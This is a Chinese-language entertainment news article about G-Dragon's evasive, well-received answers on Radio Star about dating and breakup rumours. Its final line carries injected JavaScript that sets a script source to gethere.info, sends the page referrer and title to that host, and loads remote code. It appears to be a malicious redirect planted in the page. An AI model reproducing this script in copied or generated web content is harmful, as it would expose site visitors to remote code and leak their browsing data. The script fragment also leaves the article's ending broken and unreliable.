▲G-Dragon回應戀愛分手傳聞。(圖/翻攝自YouTube)

 

在28日播出的《黃金漁場Radio Star》中,主持人和BIGBANG的G-Dragon談到關於今年傳出的分手及戀愛的相關話題,G-Dragon巧妙的回答,也獲得許多好評。

G-Dragon曾和水原希子與小松菜奈傳過緋聞,在《黃金漁場Radio Star》中中,以毒舌、問問題尖銳聞名的主持群自然也沒有放過這個話題,尹鐘信先是問「分手和戀愛都是今年的事嗎?」隨後SUPER JUNIOR圭賢補充:「分手是跟Ki…戀愛是跟ko…」讓G-Dragon瞬間不知道該做何反應,只能回:「(關係)還不明確。」

之後,尹鐘信繼續逼問:「那分手是傳言嗎?」,G-Dragon則說,如果他承認了「分手說」,那也就是承認曾經有過戀愛,所以他認為無論是分手或是戀愛,對他來說都不是很明確的,而主持群「釣魚」失敗的模樣,也成功引發觀眾爆笑。

此外,對於如果之後真的有談戀愛、戀情是否要公開,G-Dragon表示,如果女方想要公開那麼他就會公開,但他也覺得因為自己身為公眾人物、戀情公開的話感覺會對女方造成很多傷害,在考慮各種層面後,認為:「雖然大眾有知的權力,但我也沒有要回應的義務。」高sense的回答,不但在現場獲得認同,更得到許多網友稱讚,認為GD非常帥氣。s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + “;